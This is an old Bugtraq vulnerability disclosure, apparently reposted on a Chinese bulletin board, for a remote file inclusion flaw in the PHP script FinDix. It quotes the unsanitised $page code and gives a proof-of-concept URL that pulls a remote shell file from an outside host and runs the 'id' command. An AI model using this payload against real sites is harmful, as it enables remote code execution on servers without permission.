FinDix Remote File Inclusion Vulnerability

看板Bugtraq作者時間18年前 (2007/08/13 14:39), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
FinDix Remote File Inclusion Vulnerability ----------------------------------------------------------------------- Script : FinDix Site : http://ctw-design.com/styldiv/FindNix.zip Founder : Rizgar Contact : rizgar@linuxmail.org Thanks : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my heros :] ----------------------------------------------------------------------- Okey now in the script found bug : Line : 34-35 /* * load page in content table */ if ($page == "") $page = "start.htm"; //* change to your start page content. /* PoC : http://www.site.com/findix/index.php?page=http://shell.txt?&cmd=id
文章代碼(AID): #16l_o-00 (Bugtraq)